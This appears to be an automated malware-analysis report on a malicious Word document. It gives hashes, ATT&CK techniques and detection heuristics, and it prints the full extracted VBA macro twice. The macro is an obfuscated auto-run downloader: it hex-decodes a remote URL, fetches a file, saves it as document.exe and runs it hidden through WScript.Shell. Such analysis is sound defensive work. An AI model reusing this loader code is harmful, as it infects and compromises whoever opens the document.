Office (OLE) malware analysis — malicious · 6d829f48fc56eb0b

MALICIOUS

Office (OLE)

3.49 MB Created: 2018-04-26 04:15:00 Authoring application: Microsoft Office Word First seen: 2019-06-27

MD5: 22be2a6bd7b409a44a85f77c06605f55 SHA-1: 4db3579e9296640896c9067030dbac571085f9de SHA-256: 6d829f48fc56eb0b79341bf9e676f08bffe5c678d76eb481f5ffd3f5f0ed8a8d

350 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample contains critical heuristics indicating the presence of obfuscated VBA macros designed to execute code. Specifically, the AutoOpen macro downloads a file named 'document.exe' from the reconstructed URL "the embedded link" and then executes it using WScript.Shell. This indicates a downloader or droppper functionality.

Heuristics 9

ClamAV: Doc.Malware.Valyria-6923224-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Valyria-6923224-0
VBA macros detected medium 6 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
'result = Shell(fgtzpbyezdhvmwsmxx, ivysjjfauy)
```
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
Matched line in script
```
qapokhrcqdokh.Write plceezzoj.ResponseBody
```
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script
```
Set plceezzoj = CreateObject(sicijeddqlvi("4d53584d4c322e536572") & sicijeddqlvi("766572584d4c485454502e362e30"))
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Set plceezzoj = CreateObject(sicijeddqlvi("4d53584d4c322e536572") & sicijeddqlvi("766572584d4c485454502e362e30"))

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2005 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2005 bytes
SHA-256: `ab076dfb31005c8f1489fdcddafe644dfa2c71da09bf83b9498404ed5f3d896a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Const fwixladobe = 2 Const shrgzntfoe = 1 Const ivysjjfauy = 0 Private Sub ornwgycoznowp() Dim wkojhddyrkko As String Dim fgtzpbyezdhvmwsmxx As String Dim plceezzoj As Object, qapokhrcqdokh As Object Dim fzixjihkfnpatuefj As Integer wkojhddyrkko = sicijeddqlvi("68747470733a2f2f6769746875622e636f6d2f47683035375072316e63332f6d6163726f2f626c6f622f6d61737465722f") & sicijeddqlvi("646f63756d656e742e7478743f7261773d74727565") fgtzpbyezdhvmwsmxx = sicijeddqlvi("646f63756d656e742e65") & sicijeddqlvi("7865") Set plceezzoj = CreateObject(sicijeddqlvi("4d53584d4c322e536572") & sicijeddqlvi("766572584d4c485454502e362e30")) plceezzoj.setOption(2) = 13056 plceezzoj.Open sicijeddqlvi("474554"), wkojhddyrkko, False plceezzoj.setRequestHeader sicijeddqlvi("557365") & sicijeddqlvi("722d4167656e74"), sicijeddqlvi("4d6f7a696c") & sicijeddqlvi("6c612f342e302028636f6d70617469626c653b204d53494520362e303b2057696e646f7773204e5420352e3029") plceezzoj.Send If plceezzoj.Status = 200 Then Set qapokhrcqdokh = CreateObject(sicijeddqlvi("41444f4442") & sicijeddqlvi("2e53747265616d")) qapokhrcqdokh.Open qapokhrcqdokh.Type = 1 qapokhrcqdokh.Write plceezzoj.ResponseBody qapokhrcqdokh.SaveToFile fgtzpbyezdhvmwsmxx, 2 qapokhrcqdokh.Close CreateObject(sicijeddqlvi("575363726970742e53") & sicijeddqlvi("68656c6c")).Run fgtzpbyezdhvmwsmxx, 0 'result = Shell(fgtzpbyezdhvmwsmxx, ivysjjfauy) End If End Sub Sub AutoOpen() ornwgycoznowp End Sub Private Function sicijeddqlvi(ByVal lvexakixdvmt As String) As String Dim sbbscauhbbmv As Long For sbbscauhbbmv = 1 To Len(lvexakixdvmt) Step 2 sicijeddqlvi = sicijeddqlvi & Chr$(Val("&H" & Mid$(lvexakixdvmt, sbbscauhbbmv, 2))) Next sbbscauhbbmv End Function

SHA-256: ab076dfb31005c8f1489fdcddafe644dfa2c71da09bf83b9498404ed5f3d896a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const fwixladobe = 2
Const shrgzntfoe = 1
Const ivysjjfauy = 0
Private Sub ornwgycoznowp()
Dim wkojhddyrkko As String
Dim fgtzpbyezdhvmwsmxx As String
Dim plceezzoj As Object, qapokhrcqdokh As Object
Dim fzixjihkfnpatuefj As Integer
wkojhddyrkko = sicijeddqlvi("68747470733a2f2f6769746875622e636f6d2f47683035375072316e63332f6d6163726f2f626c6f622f6d61737465722f") & sicijeddqlvi("646f63756d656e742e7478743f7261773d74727565")
fgtzpbyezdhvmwsmxx = sicijeddqlvi("646f63756d656e742e65") & sicijeddqlvi("7865")
Set plceezzoj = CreateObject(sicijeddqlvi("4d53584d4c322e536572") & sicijeddqlvi("766572584d4c485454502e362e30"))
plceezzoj.setOption(2) = 13056
plceezzoj.Open sicijeddqlvi("474554"), wkojhddyrkko, False
plceezzoj.setRequestHeader sicijeddqlvi("557365") & sicijeddqlvi("722d4167656e74"), sicijeddqlvi("4d6f7a696c") & sicijeddqlvi("6c612f342e302028636f6d70617469626c653b204d53494520362e303b2057696e646f7773204e5420352e3029")
plceezzoj.Send
If plceezzoj.Status = 200 Then
Set qapokhrcqdokh = CreateObject(sicijeddqlvi("41444f4442") & sicijeddqlvi("2e53747265616d"))
qapokhrcqdokh.Open
qapokhrcqdokh.Type = 1
qapokhrcqdokh.Write plceezzoj.ResponseBody
qapokhrcqdokh.SaveToFile fgtzpbyezdhvmwsmxx, 2
qapokhrcqdokh.Close
CreateObject(sicijeddqlvi("575363726970742e53") & sicijeddqlvi("68656c6c")).Run fgtzpbyezdhvmwsmxx, 0
'result = Shell(fgtzpbyezdhvmwsmxx, ivysjjfauy)
End If
End Sub
Sub AutoOpen()
ornwgycoznowp
End Sub
Private Function sicijeddqlvi(ByVal lvexakixdvmt As String) As String
Dim sbbscauhbbmv As Long
For sbbscauhbbmv = 1 To Len(lvexakixdvmt) Step 2
sicijeddqlvi = sicijeddqlvi & Chr$(Val("&H" & Mid$(lvexakixdvmt, sbbscauhbbmv, 2)))
Next sbbscauhbbmv
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.